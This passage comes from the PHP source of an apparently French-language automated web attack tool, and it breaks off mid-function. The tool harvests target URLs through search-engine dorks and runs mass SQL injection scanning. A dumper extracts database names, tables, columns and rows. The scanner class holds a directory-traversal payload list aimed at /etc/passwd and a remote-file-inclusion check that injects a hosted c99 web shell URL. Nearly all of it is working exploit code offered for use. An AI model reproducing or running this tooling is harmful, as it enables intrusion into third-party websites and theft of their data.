184 | 		$_SESSION["url_vulne"] = array();
185 | 	}
186 | }
187 | 
188 | else if(isset($_GET["importer"]))
189 | {
190 | 	if($_GET["importer"] == 'url')
191 | 	{
192 | 		if(isset($_POST["content-file"]))
193 | 		{
194 | 			$content = $_POST["content-file"];
195 | 			$arrayDeja = $_SESSION["url_trouver"];
196 | 			$arrContent = explode("\r\n", $content);
197 | 		  	$Array_Finale = array_unique(array_merge($arrayDeja, $arrContent));
198 | 		  	$_SESSION["url_trouver"] = $Array_Finale;
199 | 		  	echo "OK";
200 | 		}
201 | 		else
202 | 		{
203 | 			echo "No POST";
204 | 		}
205 | 	}
206 | }
207 | 
208 | ?>
209 | 


--------------------------------------------------------------------------------
/request/controller/AnalyseController.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | class AnalyseController extends Controller
 3 | {
 4 | 
 5 | 	function start() {
 6 | 		$this->checkPostField(array('url_point', 'union'));
 7 | 		$data = $this->request->data;
 8 | 		$d = array();
 9 | 
10 | 		if (strpos($data->url_point, '?') !== false && strpos($data->url_point, '=') !== false) {
11 | 			if (strpos($data->union, '[t]') !== false) {
12 | 				$inj = new sqli_inject();
13 | 				$d['result'] = $inj->uniqueAnalyse($data->url_point, $data->union);
14 | 				$d['url_point'] = $data->url_point;
15 | 				$d['success'] = true;
16 | 		  } else {
17 | 				$d['success'] = false;
18 | 				$d['message'] = 'Format de union incorecte absence de la var [t]';
19 | 			}
20 | 		} else {
21 | 			$d['success'] = false;
22 | 			$d['message'] = 'Url point is not valid';
23 | 		}
24 | 
25 | 		$this->set($d);
26 | 	}
27 | 
28 | }
29 | 


--------------------------------------------------------------------------------
/request/controller/DumperController.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | class DumperController extends Controller
  3 | {
  4 | 
  5 | 	function start() {
  6 | 		$this->checkPostField(array('url_point'));
  7 | 		$data = $this->request->data;
  8 | 		$d = array();
  9 | 
 10 | 		if (strpos($data->url_point, '[t]') !== false) {
 11 | 			$dmp = new sqli_dump();
 12 | 			$dmp->url_point = $data->url_point;
 13 | 			$obj = $dmp->getFirst();
 14 | 
 15 | 			$d['url_point'] = $dmp->url_point;
 16 | 			$this->set($obj);
 17 | 			$d['success'] = true;
 18 | 		} else {
 19 | 			$d['success'] = false;
 20 | 			$d['message'] = 'Url point is not valid';
 21 | 		}
 22 | 
 23 | 		$this->set($d);
 24 | 	}
 25 | 
 26 | 	function get_diagram() {
 27 | 		$d = array();
 28 | 		$this->checkPostField(array('url_point', 'object', 'diagram'));
 29 | 		$data = $this->request->data;
 30 | 
 31 | 		$dmp = new sqli_dump();
 32 | 		$dmp->url_point = $data->url_point;
 33 | 		$diagram = new StdClass();
 34 | 		$d = array();
 35 | 
 36 | 		if (!$diagram = @json_decode($data->diagram)) {
 37 | 			$d['success'] = false;
 38 | 			$d['message'] = 'Error json failed decode';
 39 | 		}
 40 | 
 41 | 		if ($data->object == 'basededonne') {
 42 | 			$diagram = $dmp->getAllDb();
 43 | 		} else {
 44 | 
 45 | 			$i = 0;
 46 | 			foreach ($diagram as $k => $db) {
 47 | 
 48 | 				if ($data->object == 'tables') {
 49 | 					if ($db->checked == true) {
 50 | 						$diagram[$i]->childs = $dmp->getTable($db->name);
 51 | 					}
 52 | 				}
 53 | 
 54 | 				if ($data->object == 'colonnes') {
 55 | 					$t = 0;
 56 | 					$tables = $db->childs;
 57 | 					foreach ($tables as $tb_k => $tb) {
 58 | 
 59 | 						if ($tb->checked == true) {
 60 | 					  		$column = $dmp->getColonne($db->name, $tb->name);
 61 | 					  		$tables[$t]->childs = $column;
 62 | 						}
 63 | 
 64 | 
 65 | 						$t++;
 66 | 					}
 67 | 				}
 68 | 
 69 | 				$i++;
 70 | 			}
 71 | 
 72 | 		}
 73 | 
 74 | 		if (!empty($diagram)) {
 75 | 			$d['success'] = true;
 76 | 			$d['diagram'] = $diagram;
 77 | 		} else {
 78 | 			$d['success'] = false;
 79 | 			$d['message'] = 'Error try again.';
 80 | 		}
 81 | 
 82 | 		$this->set($d);
 83 | 	}
 84 | 
 85 | 	function get_initDump() {
 86 | 		$this->checkPostField(array('url_point', 'diagram'));
 87 | 		$data = $this->request->data;
 88 | 		$dmp = new sqli_dump();
 89 | 		$dmp->url_point = $data->url_point;
 90 | 		$d = array();
 91 | 
 92 | 		if (!$diagram = @json_decode($data->diagram)) {
 93 | 			$d['success'] = false;
 94 | 			$d['message'] = 'Error json failed decode';
 95 | 		}
 96 | 
 97 | 		$i = 0;
 98 | 		$name_dump = '';
 99 | 		$row_count = '';
100 | 		$wrap_colonnes = '';
101 | 		$db_name = '';
102 | 		$tb_name = '';
103 | 		//print_r($diagram);
104 | 		foreach ($diagram as $k => $db) {
105 | 
106 | 			foreach ($db->childs as $tb_k => $tb) {
107 | 
108 | 				foreach ($tb->childs as $cl_k => $cl) {
109 | 					if ($cl->checked == true) {
110 | 						$wrap_colonnes .= $cl->name . ',';
111 | 					}
112 | 				}
113 | 				$wrap_colonnes = rtrim($wrap_colonnes, ',');
114 | 				if (!empty($wrap_colonnes)) {
115 | 					$name_dump = $db->name . '.' . $tb->name;
116 | 					$db_name = $db->name;
117 | 					$tb_name = $tb->name;
118 | 					$row_count = $dmp->getNombreDonne($db->name, $tb->name);
119 | 					break;
120 | 				}
121 | 
122 | 			}
123 | 
124 | 			$i++;
125 | 		}
126 | 
127 | 		if (!empty($name_dump) && !empty($row_count) && $row_count > 0) {
128 | 			$d['success'] = true;
129 | 			$d['name_dump'] = $name_dump;
130 | 			$d['row_count'] = $row_count;
131 | 			$d['infos'] = array(
132 | 				'db_name' => $db_name,
133 | 				'tb_name' => $tb_name,
134 | 				'colonnes' => $wrap_colonnes
135 | 			);
136 | 		} else {
137 | 			if ($row_count == 0) {
138 | 				$d['message'] = '0 rows found';
139 | 			} else {
140 | 				$d['message'] = 'Error, try again. Code: RC+0';
141 | 			}
142 | 			$d['success'] = false;
143 | 
144 | 			$d['name_dump'] = $name_dump;
145 | 			$d['row_count'] = $row_count;
146 | 		}
147 | 
148 | 		$this->set($d);
149 | 	}
150 | 
151 | 	function get_row() {
152 | 		$this->checkPostField(array('url_point', 'infos'));
153 | 		$data = $this->request->data;
154 | 		$d = array();
155 | 		$dmp = new sqli_dump();
156 | 		$dmp->url_point = $data->url_point;
157 | 
158 | 		if (!$infos = @json_decode($data->infos)) {
159 | 			$d['success'] = false;
160 | 			$d['message'] = 'Error json failed decode';
161 | 		} if (!isset($data->row) || !is_numeric($data->row)) {
162 | 			echo "Error nbr row";
163 | 			exit;
164 | 		}
165 | 		$colonnes = explode(',', $infos->colonnes);
166 | 		$rowData = $dmp->getRow($infos->db_name, $infos->tb_name, $colonnes, $data->row);
167 | 
168 | 		$row = array();
169 | 		$i = 0;
170 | 		foreach ($colonnes as $key => $value) {
171 | 			$row += array( $value => $rowData[$i] );
172 | 			$i++;
173 | 		}
174 | 
175 | 		if (!empty($rowData)) {
176 | 			$d['success'] = true;
177 | 			$d['row'] = $row;
178 | 		} else {
179 | 			$d['success'] = false;
180 | 			$d['message'] = 'Error, try again. Row data:' . print_r($rowData, true);
181 | 		}
182 | 
183 | 		$this->set($d);
184 | 	}
185 | 
186 | 	function exporte() {
187 | 		$this->checkPostField(array('urls'));
188 | 		$data = $this->request->data;
189 | 
190 | 		$Listeurls = implode(',', $data->urls);
191 | 
192 | 		$fichier = ROOT . DS . 'logs' . DS . date('m-Y') . DS . 'urls_' . date('d-m-Y-H-i') . '.txt';
193 | 		$handle = fopen($fichier, "w");
194 | 		fwrite($handle, $Listeurls);
195 | 		fclose($handle);
196 | 
197 | 		header('Content-type: text/plain');
198 | 		header('Content-Length: ' . filesize($fichier));
199 | 		header('Content-Disposition: attachment; filename='.basename($fichier));
200 | 		readfile($fichier);
201 | 	}
202 | 
203 | }
204 | 


--------------------------------------------------------------------------------
/request/controller/HomeController.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | class HomeController extends Controller
 3 | {
 4 |   function index()
 5 |   {
 6 | 
 7 |   }
 8 |   
 9 | }
10 | 


--------------------------------------------------------------------------------
/request/controller/RechercheController.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | class RechercheController extends Controller
 3 | {
 4 |   function start()
 5 |   {
 6 |     $d = array();
 7 | 
 8 |     $this->checkPostField(array('dorks', 'engines'));
 9 |     $data = $this->request->data;
10 | 
11 |     $sreacher = new Rechercheur();
12 |     $resultat = '';
13 |     $moteurs = explode(';', $data->engines);
14 | 
15 |     if (in_array('google', $moteurs) && in_array('bing', $moteurs) && in_array('yahoo', $moteurs)){
16 |       $resultat = $sreacher->allEngine($data->dorks, 1);
17 |     }else{
18 |       if (in_array('google', $moteurs)){
19 |         $resultat = $sreacher->google($data->dorks, 1);
20 |       }
21 |     }
22 | 
23 |     $array_url_Ancien = isset($data->urls) ? explode("\r\n", $data->urls) : array();
24 |     $Array_Finale = array_unique(array_merge($array_url_Ancien, $resultat));
25 | 
26 |     $d['urls'] = $Array_Finale;
27 |     $d['success'] = true;
28 |       
29 |     $this->set($d);
30 |   }
31 | 
32 |   function exporte()
33 |   {
34 | 		$Listeurls = $this->Session->read('recherche_urls');
35 | 
36 |     $dir = APP.DS.'logs'.DS.date('m-Y');
37 |     if(!file_exists($dir))  mkdir($dir, 0700);
38 | 
39 |     $fichier = $dir.DS.'urls_'.date('d-m-Y-H-i').'.txt';
40 | 
41 | 		$handle = fopen($fichier, "w");
42 | 		fwrite($handle, implode("\r\n", $Listeurls));
43 | 		fclose($handle);
44 | 
45 | 		header('Content-type: text/plain');
46 | 		header('Content-Length: '.filesize($fichier));
47 | 		header('Content-Disposition: attachment; filename='.basename($fichier));
48 | 		readfile($fichier);
49 |   }
50 | 
51 | }
52 | 


--------------------------------------------------------------------------------
/request/scanneur_class.php:
--------------------------------------------------------------------------------
   1 | <?php
   2 | /**
   3 | * Scanneur Classe
   4 | **/
   5 | if (!function_exists('curl_init')){
   6 |     die('<b>Désolé cURL n\'est pas installer!</b>');
   7 | }
   8 | class Curl
   9 | {
  10 | 	public function get($url)
  11 | 	{
  12 | 		$ch = new chaine();
  13 | 		$curl = curl_init();
  14 | 		curl_setopt($curl, CURLOPT_URL, $url);
  15 | 		curl_setopt($curl, CURLOPT_TIMEOUT, 50);
  16 | 		curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  17 | 		curl_setopt($curl,CURLOPT_SSL_VERIFYPEER, false);
  18 |         curl_setopt($curl,CURLOPT_FOLLOWLOCATION, true);
  19 |         curl_setopt($curl,CURLOPT_RETURNTRANSFER, true);
  20 | 		$output = curl_exec($curl);
  21 | 		curl_close ($curl);
  22 | 		return $output;
  23 | 	}
  24 | }
  25 | class Rechercheur
  26 | {
  27 | 	//**************************************Controlleur*********************************************
  28 | 	public function allEngine($dork, $page)
  29 | 	{
  30 | 		$save = new Sauvegardeur();
  31 | 		$rs = "";
  32 | 		$rs .= $this->_google_exe($dork, $page);
  33 | 		$rs .= $this->_bing_exe($dork, $page);
  34 | 		$rs .= $this->_yahoo_exe($dork, $page);
  35 | 		$save->saveListeUrl($rs);
  36 | 		$this->SuprimerVide();
  37 | 		return $rs;
  38 | 	}
  39 | 	public function  google($dork, $page)
  40 | 	{
  41 | 		$save = new Sauvegardeur();
  42 | 		$resultat = $this->_google_exe($dork, $page);
  43 | 		$save->saveListeUrl($resultat);
  44 | 		$this->SuprimerVide();
  45 | 		return $resultat;
  46 | 	}
  47 | 	public function bing($dork, $page)
  48 | 	{
  49 | 		$save = new Sauvegardeur();
  50 | 		$resultat = $this->_bing_exe($dork, $page);
  51 | 		$save->saveListeUrl($resultat);
  52 | 		$this->SuprimerVide();
  53 | 		return $resultat;
  54 | 	}
  55 | 	public function yahoo($dork, $page)
  56 | 	{
  57 | 		$save = new Sauvegardeur();
  58 | 		$resultat = $this->_yahoo_exe($dork, $page);
  59 | 		$save->saveListeUrl($resultat);
  60 | 		$this->SuprimerVide();
  61 | 		return $resultat;
  62 | 	}
  63 | 	//******************************************DELETE EMPTY******************************************************
  64 | 	private function SuprimerVide()
  65 | 	{
  66 | 		if(($cle = array_search("", $_SESSION["url_trouver"])) !== false) 
  67 | 		{
  68 | 		    unset($_SESSION["url_trouver"][$cle]);
  69 | 		}
  70 | 	}
  71 | 	//**********************************exe order**********************************************************************
  72 | 	private function  _google_exe($dork, $page)
  73 | 	{
  74 | 		$_url_base = 'https://www.google.fr/search?q='.urlencode($dork).'&start=PAGE';
  75 | 		$req = new Curl();
  76 | 		$ext = new Extracteur();
  77 | 		$list_url = "";
  78 | 		$page = intval($page."0");
  79 | 		$p = 0;
  80 | 		while ($p <= $page) 
  81 | 		{
  82 | 			$url = str_replace("PAGE", $p, $_url_base);
  83 | 			$code = $req->get($url);
  84 | 			$list_url .= $ext->google($code);
  85 | 			$p += 10;
  86 | 		}	
  87 | 		return $list_url;
  88 | 	}
  89 | 	private function _bing_exe($dork, $page)
  90 | 	{
  91 | 		$_url_base = 'http://www.bing.com/search?q='.urlencode($dork).'&first=PAGE';
  92 | 		$req = new Curl();
  93 | 		$ext = new Extracteur();
  94 | 		$list_url = "";
  95 | 		$p = 0;
  96 | 		while ($p <= $page) 
  97 | 		{
  98 | 			$url = str_replace("PAGE", $p, $_url_base);
  99 | 			$code = $req->get($url);
 100 | 			$list_url .= $ext->bing($code);
 101 | 			$p++;
 102 | 		}	
 103 | 		return $list_url;
 104 | 	}
 105 | 	private function _yahoo_exe($dork, $page)
 106 | 	{
 107 | 		$_url_base = 'http://search.yahoo.com/search?p='.urlencode($dork).'&xargs=0&b=PAGE';
 108 | 		$req = new Curl();
 109 | 		$ext = new Extracteur();
 110 | 		$list_url = "";
 111 | 		$page = intval($page."1");
 112 | 		//$page doit rajoute un 2 car sa va exemple: 1-11-21-31-41
 113 | 		$p = 1;
 114 | 		while ($p <= $page) 
 115 | 		{
 116 | 			$url = str_replace("PAGE", $p, $_url_base);
 117 | 			$code = $req->get($url);
 118 | 			$list_url .= $ext->yahoo($code);
 119 | 			$p += 10;
 120 | 		}	
 121 | 		return $list_url;
 122 | 	}
 123 | }
 124 | class Extracteur
 125 | {
 126 | 	public $separateur = "\r\n";
 127 | 
 128 | 	private function getLinks($links)
 129 | 	{
 130 | 		$ret = array();
 131 | 		$dom = new domDocument;
 132 | 		@$dom->loadHTML(file_get_contents($link));
 133 | 		$dom->preserveWhiteSpace = false;
 134 | 		$links = $dom->getElementsByTagName('a');
 135 | 		foreach ($links as $tag) 
 136 | 		{ 
 137 | 			$ret[$tag->getAttribute('href')] = $tag->childNodes->item(0)->nodeValue; 
 138 | 		}
 139 | 		return $ret;
 140 | 	}
 141 | 	private function RepareGog($url)
 142 | 	{
 143 | 		$url = $this->Decode($url);
 144 | 		$url = str_replace("/url?q=", "", $url);
 145 | 		$arrfin = explode("&sa=", $url);
 146 | 		$url = $arrfin[0];
 147 | 		return html_entity_decode(urldecode($url));
 148 | 	}
 149 | 	public function RepareYahoo($url)
 150 | 	{
 151 | 		$url = $this->Decode($url);
 152 | 		$url = str_replace("<b>", "", $url);
 153 | 		$url = str_replace("<wbr />", "", $url);
 154 | 		$url = str_replace("</b>", "", $url);
 155 | 		$url = "http://".$url;
 156 | 		return html_entity_decode(urldecode($url));
 157 | 	}
 158 | 	private function Decode($str)
 159 | 	{
 160 | 		return html_entity_decode(urldecode($str));
 161 | 	}
 162 |   private function getNomDom($url)
 163 |   {
 164 |   	$u = explode('/', $url);
 165 |   	return $u[2];
 166 |   }
 167 |   public function BlackList($url)
 168 |   {
 169 |     $black = array(
 170 |       "google", 
 171 |       "msn", 
 172 |       "yahoo", 
 173 |       "ebay", 
 174 |       "youtube", 
 175 |       "facebook", 
 176 |       "twitter",
 177 |       "github",
 178 |       "pastebin.com",
 179 |       "stackoverflow.com",
 180 | 	  ".phpni.",
 181 |       "php.net",
 182 |     );
 183 |     $ok = false;
 184 |     foreach($black as $element)
 185 |     {
 186 |       if(strpos($url, $element) !== false)
 187 |       {
 188 |         $ok = true;
 189 |         break;
 190 |       }
 191 |     }
 192 |     return $ok;
 193 |   }
 194 |     public function VerfierURL($url)
 195 | 	{
 196 | 	    $domUrl = $this->getNomDom($url);
 197 | 	    if((!$this->VerfierExistDom($domUrl)) && (!$this->BlackList($url)))
 198 | 	    {
 199 | 	      if(isset($_POST["btn_url_with_param"]) && $_POST["btn_url_with_param"] == "1")
 200 | 	      {
 201 | 	        if((strpos('?', $url) !== false) && (strpos('=', $url) !== false))
 202 | 	        {
 203 | 	          return true; }
 204 | 	        else {
 205 | 	          return false;
 206 | 	        }
 207 | 	      }
 208 | 	      else
 209 | 	      {
 210 | 	        return true;
 211 | 	      }
 212 | 	    }
 213 | 	}
 214 |   public function VerfierExistDom($dom)
 215 |   {
 216 |   	$ok = false;
 217 |   	if(isset($_SESSION["url_trouver"])) {
 218 | 	    $Urls = $_SESSION["url_trouver"];
 219 | 	    foreach ($Urls as $element) 
 220 | 	    {
 221 | 	        if(!empty($element) && strpos($dom, $element) !== false) 
 222 | 	        {
 223 | 	          $ok = true;
 224 | 	          break;
 225 | 	        } else { }
 226 | 	    }
 227 | 	}
 228 |     return $ok;
 229 |   }
 230 | 	public function google($code)
 231 | 	{
 232 | 		preg_match_all("@<h3\s*class=\"r\">\s*<a[^<>]*href=\"([^<>]*)\"[^<>]*>(.*)</a>\s*</h3>@siU", $code, $matches);
 233 | 		$i = 0;
 234 | 		$n = count($matches[1]);
 235 | 		$Urls = '';
 236 | 		while($i < $n) 
 237 | 		{
 238 | 			$url = trim($matches[1][$i]);
 239 | 			$url = $this->RepareGog($url);
 240 | 	      $domUrl = $this->getNomDom($url);
 241 | 	      if(!strpos($Urls, $domUrl) !== false)
 242 | 	      {
 243 | 	        if($this->VerfierURL($url))
 244 | 	        {
 245 | 	           $Urls .= $url."\r\n";
 246 | 	        }
 247 | 	      }
 248 | 			$i++;
 249 | 			flush();
 250 | 		}
 251 | 
 252 | 		return $Urls;
 253 | 	}
 254 | 	public function bing($page)
 255 | 	{
 256 | 		preg_match_all("/<h2><a href=\"(.*?)\"/", $page, $output_array);
 257 | 		$i = 0;
 258 | 		$n = count($output_array[1]);
 259 | 		$Urls = '';
 260 | 		while($i < $n) 
 261 | 		{
 262 | 			$url = urldecode(trim($output_array[1][$i]));
 263 | 	      	$domUrl = $this->getNomDom($url);
 264 | 	      	if(!strpos($Urls, $domUrl) !== false)
 265 | 	      	{
 266 | 	        	if($this->VerfierURL($url))
 267 | 	        	{
 268 | 	           		$Urls .= $url."\r\n";
 269 | 	        	}
 270 | 	      	}
 271 | 			$i++;
 272 | 			flush();
 273 | 		}
 274 | 		return $Urls;
 275 | 	}
 276 | 	public function yahoo($page)
 277 | 	{
 278 | 		preg_match_all("/fw-m fc-12th wr-bw\">(.*?)<\/span>/", $page, $output_array);
 279 | 		$i = 0;
 280 | 		$n = count($output_array[1]);
 281 | 		$Urls = '';
 282 | 		while($i < $n) 
 283 | 		{
 284 | 			$url = urldecode(trim($output_array[1][$i]));
 285 | 			$url = $this->RepareYahoo($url);
 286 | 	      	$domUrl = $this->getNomDom($url);
 287 | 	      	if(!strpos($Urls, $domUrl) !== false)
 288 | 	      	{
 289 | 	        	if($this->VerfierURL($url))
 290 | 	        	{
 291 | 	           		$Urls .= $url."\r\n";
 292 | 	        	}
 293 | 	      	}
 294 | 			$i++;
 295 | 			flush();
 296 | 		}
 297 | 		return $Urls;
 298 | 	}
 299 | }
 300 | class Sauvegardeur
 301 | {
 302 | 	public $Dossier = "File_URL";
 303 | 
 304 | 	public function saveListeUrl($liste_url)
 305 | 	{
 306 | 		/*if(strlen($liste_url) > 0) {
 307 | 			$chemin = "/liste_url_".$_SESSION["nomutilisateur"].".txt";
 308 | 			$file = fopen($chemin, "w") or die("Unable to open file!");
 309 | 			fwrite($file, $liste_url);
 310 | 			fclose($file);
 311 | 		}*/
 312 | 	}
 313 | 	public function saveListeFaille($liste_url)
 314 | 	{
 315 | 		/*if(strlen($liste_url) > 0) {
 316 | 			$filename = "/liste_url_exploitable_".$_SESSION["nomutilisateur"].".txt";
 317 | 			$file = fopen($this->Dossier.$filename, "w") or die("Unable to open file!");
 318 | 			fwrite($file, $liste_url);
 319 | 			fclose($file);
 320 | 		}*/
 321 | 	}
 322 | }
 323 | class Scanneur 
 324 | { 
 325 | 	public function Scanne($array_url)
 326 | 	{
 327 | 		$resultat = "";
 328 | 		$nbr_elmt = count($array_url);
 329 | 		$e = '';
 330 | 		foreach ($array_url as $key => $url) 
 331 | 		{
 332 | 			$e .= $url;
 333 | 			if($url != "") 
 334 | 			{
 335 | 				$this->SuprimerDansTrv($url);
 336 | 				if($this->sql($url))
 337 | 				{
 338 | 					$resultat .= $url . "\r\n";
 339 | 				}
 340 | 			}
 341 | 		}
 342 | 		$_SESSION["erreur"] = $e;
 343 | 		$this->SuprimerDansTrv("");
 344 | 		return $resultat;
 345 | 	}
 346 | 
 347 | 	private function SuprimerDansTrv($str)
 348 | 	{
 349 | 		if(($cle = array_search($str, $_SESSION["url_trouver"])) !== false) 
 350 | 		{
 351 | 		    unset($_SESSION["url_trouver"][$cle]);
 352 | 		}
 353 | 	}
 354 | 
 355 | 	private function lfi($url) 
 356 | 	{
 357 | 		$req = new Curl();
 358 | 		$lfifound = 0;
 359 | 		$lfi = array("/etc/passwd",
 360 | 				"../etc/passwd",
 361 | 				"../../etc/passwd",
 362 | 				"../../../etc/passwd",
 363 | 				"../../../../etc/passwd",
 364 | 				"../../../../../etc/passwd",
 365 | 				"../../../../../../etc/passwd",
 366 | 				"../../../../../../../etc/passwd",
 367 | 				"../../../../../../../../etc/passwd",
 368 | 				"../../../../../../../../../etc/passwd",
 369 | 				"../../../../../../../../../../etc/passwd",
 370 | 				"/etc/passwd%00",
 371 | 				"../etc/passwd%00",
 372 | 				"../../etc/passwd%00",
 373 | 				"../../../etc/passwd%00",
 374 | 				"../../../../etc/passwd%00",
 375 | 				"../../../../../etc/passwd%00",
 376 | 				"../../../../../../etc/passwd%00",
 377 | 				"../../../../../../../etc/passwd%00",
 378 | 				"../../../../../../../../etc/passwd%00",
 379 | 				"../../../../../../../../../etc/passwd%00",
 380 | 				"../../../../../../../../../../etc/passwd%00");
 381 | 
 382 | 		$totallfi = count($lfi); 
 383 | 		for($i = 0; $i < $totallfi; $i++) 
 384 | 		{ 
 385 | 			$url_t = $site.$lfi[$i];
 386 | 			$page = $req->get($url_t); 
 387 | 			if (preg_match("/root/i",$page, $matches)) 
 388 | 			{ 
 389 | 				echo "LFI trouver: $site$lfi[$i]<br>"; 
 390 | 				$lfifound = 1; 
 391 | 			}
 392 | 		}
 393 | 		if ($lfifound == 0) 
 394 | 		{ 
 395 | 			echo "Pas de LFI trouver.<br>"; 
 396 | 		} 
 397 | 	}
 398 | 	private function rfi($url)
 399 | 	{
 400 | 
 401 | 		$rfifound = 0;
 402 | 		$req = new Curl();
 403 | 		$rfi = "http://fastdata.altervista.org/Hck/c99madshell_v2.1.php.php.txt?"; //c99madshell_v2.1.php.php.txt? 
 404 | 		$url_t = $url.$rfi;
 405 | 		$page = $req->get($url_t);
 406 | 
 407 | 		if (preg_match("/root/i", $page, $matches)) 
 408 | 		{
 409 | 			return true;
 410 | 			$rfifound = 1;
 411 | 		} 
 412 | 		if ($rfifound == 0) 
 413 | 		{
 414 | 			return false;
 415 | 		}
 416 | 	}
 417 | 	private function sql($url)
 418 | 	{
 419 | 		if (!strpos($url, "=") !== false)
 420 |         {
 421 |             return false;
 422 |         }
 423 |         else
 424 |         {
 425 |             $sqli = new sqli_check();
 426 |             if($sqli->demmareAnalyseFast($url))
 427 |             {
 428 |                 return true;
 429 |             }
 430 |             else
 431 |             {
 432 |                 return false;
 433 |             }
 434 |         }
 435 | 	}
 436 | }
 437 | /**
 438 | * sqli_inject
 439 | */
 440 | class sqli_inject
 441 | {
 442 | 	function __construct()
 443 | 	{
 444 | 		$this->hr = new Curl();
 445 | 		$this->ch = new chaine();
 446 | 	}
 447 | 	private $_url_originale;
 448 |     private $_url_base;
 449 |     private $_nbr_colonne;
 450 |     private $_colonne_point;
 451 |     private $_param = Array();
 452 |     private $hr;
 453 |     private $ch;
 454 |     private $baseI = "(select 1 from(select count(*),concat((select (select [t]) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)";
 455 |     private $separateur = "!~!";
 456 |     private $s_separateur = "'~!'";
 457 |     private $_union = array(
 458 |         "999999.9 union all select [t]",
 459 |         "999999.9 union all select [t]--",
 460 |         "999999.9' union all select [t] and '0'='0",
 461 |         "999999.9\" union all select [t] and \"0\"=\"0",
 462 |         "999999.9) union all select [t] and (0=0",
 463 |         "9' and [t] '1'=1",
 464 |         "9' or 1=[t] and '1'=1",
 465 |         "999999.9 union all select [t] #",
 466 |         "999999.9 union all select [t]-- #",
 467 |         "999999.9\" union all select [t] and \"0\"=\"0 #",
 468 |         "999999.9' union all select [t] and '0'='0 #",
 469 |         "999999.9) union all select [t] and (0=0) #",
 470 |     );
 471 |     public function Analyse($url)
 472 |     {
 473 |         $vrf = new sqli_check();
 474 |         $colonne = new sqli_colonne();
 475 |         $inj_point = "";
 476 |         $inj_point_curr = "";
 477 |         $point_trv = false;
 478 |         $_url_originale = $url;
 479 |         $_url_base = current(explode('?', $url));
 480 |         $this->_param = $this->ch->analyseParam($url);
 481 | 
 482 |         if ($vrf->demmareAnalyseFast($url) || $vrf->demmareAnalyseAvanced($url))
 483 |         {
 484 |             $u = 0; //Union Style 1
 485 |             while (!$point_trv && $u < count($this->_union))
 486 |             {
 487 |                 $_nbr_colonne = $colonne->Compter($this->_param, $_url_base, $this->_union[$u]);
 488 |                 for ($p = 0; $p <= count($this->_param); $p++)
 489 |                 {
 490 |                 	//echo "la ==><br>";
 491 |                     $this->_colonne_point = $colonne->FindColonneVise($_url_base . 
 492 |                     		$this->ch->escapeParam($this->ch->genParamParIndex($this->_param, 0, $p + 1)) . 
 493 |                     			str_replace("[t]", $this->ch->genNbrColonneVise($_nbr_colonne, $this->_colonne_point), $this->_union[$u]) . 
 494 |                     				$this->ch->genParamParIndex($this->_param, $p + 1, count($this->_param)), $_nbr_colonne);
 495 |                     echo "Colonne Vise ==>".$this->_colonne_point."<br>";
 496 | 
 497 |                     $inj_point = $_url_base . $this->ch->Encode($this->ch->escapeParam($this->ch->genParamParIndex($this->_param, 0, $p + 1)) . 
 498 |                     	str_replace("[t]", $this->ch->genNbrColonneVise($_nbr_colonne, $this->_colonne_point), $this->_union[$u]) . 
 499 |                     		$this->ch->genParamParIndex($this->_param, $p + 1, count($this->_param)));
 500 |                     echo "==>".$inj_point."<br>";
 501 | 
 502 |                     $inj_point_curr = str_replace("[t]", $this->ch->Encode("concat(" . 
 503 |                     		$this->ch->getHex($this->separateur) . ",concat(user()," . 
 504 |                     			$this->ch->getHex($this->s_separateur) . ",version()," . $this->ch->getHex($this->s_separateur) . 
 505 |                     			",database())," . $this->ch->getHex($this->separateur) . ")"), $inj_point);
 506 |                     echo "==>".$inj_point_curr."<br>";
 507 | 
 508 |                     $page = $this->hr->get($inj_point_curr);
 509 |                     if (strpos($page, $this->separateur) !== false || strpos($page, $this->s_separateur) !== false)
 510 |                     {
 511 |                         $this->setResult($page, $inj_point);
 512 |                         $point_trv = true;
 513 |                         break;
 514 |                     }
 515 |                     else
 516 |                     {
 517 |                         $_SESSION["result_analyse"] = "injection echouer pas de resultat ! \r\n";
 518 |                     }
 519 |                 }
 520 |                 $u++;
 521 |             }
 522 |         }
 523 |         else
 524 |         {
 525 |         	echo "Injection echouer";
 526 |         	$_SESSION["result_analyse"] = "Injection echouer char: ' \r\n";
 527 |         } 
 528 |     }
 529 |     private function setResult($page, $url_point)
 530 |     {
 531 |     	$_SESSION["page_analyse"] = $page;
 532 |         $result = $this->ch->extResult($this->separateur, $page);
 533 |         $_SESSION["result_analyse"] = "Injection point: ". $url_point . "<br>" . "Result: " . $result;
 534 | 		exit;
 535 | 		echo "Success";
 536 |     }
 537 | }
 538 | 
 539 | /**
 540 | * sqli_counter
 541 | */
 542 | class sqli_colonne
 543 | {
 544 | 	function __construct()
 545 | 	{
 546 | 		$this->hr = new Curl();
 547 | 		$this->ch = new chaine();
 548 | 	}
 549 |     private $syntax_count = "9136665621.9";
 550 |     private $okstr = "QUADCOREENGINE666";
 551 |     private $var_n = "[t]";
 552 |     private $hr;
 553 |     private $ch;
 554 | 
 555 | 	public function Compter($param, $url_base, $union)
 556 |     {
 557 |         for ($p = 0; $p < count($param); $p++)
 558 |         {
 559 |             for ($i = 0; $i <= 60; $i++)
 560 |             {
 561 |                 $url_curr = $url_base . $this->ch->ViderDernierParam($this->ch->genParamParIndex($param, 0, ($p + 1))) .
 562 | 	                $this->ch->Encode(str_replace($this->var_n, $this->GenSynHex($i), $union)) . 
 563 | 	                $this->ch->genParamParIndex($param, $p + 1, count($param));
 564 |                 $page = $this->hr->get($url_curr);
 565 |                 if (strpos($page, $this->syntax_count) !== false)
 566 |                 {
 567 |                     return $i;
 568 |                 }
 569 |             }
 570 |         }
 571 |         return 0; 
 572 |     }
 573 |     public function FindColonneVise($url, $maxColonne)
 574 |     {
 575 |         $chkstr = "concat(0x217e21," . $this->var_n . ",0x217e21)";//concat(0x217e21,0x51554144434f5245454e47494e45363636,0x217e21)
 576 |         $url_f = "";
 577 |         $_url_base = explode('?', $url);
 578 |         $_url_base = $_url_base[0];
 579 |         $_url_params = explode('?', $url);
 580 |         $_url_params = "?" . $_url_params[1];
 581 | 
 582 |         for ($i = 0; $i <= $maxColonne + 1; $i++)
 583 |         {
 584 |             $param = $this->ch->Encode(str_replace($this->var_n, $this->ch->getHex($this->okstr), $chkstr));
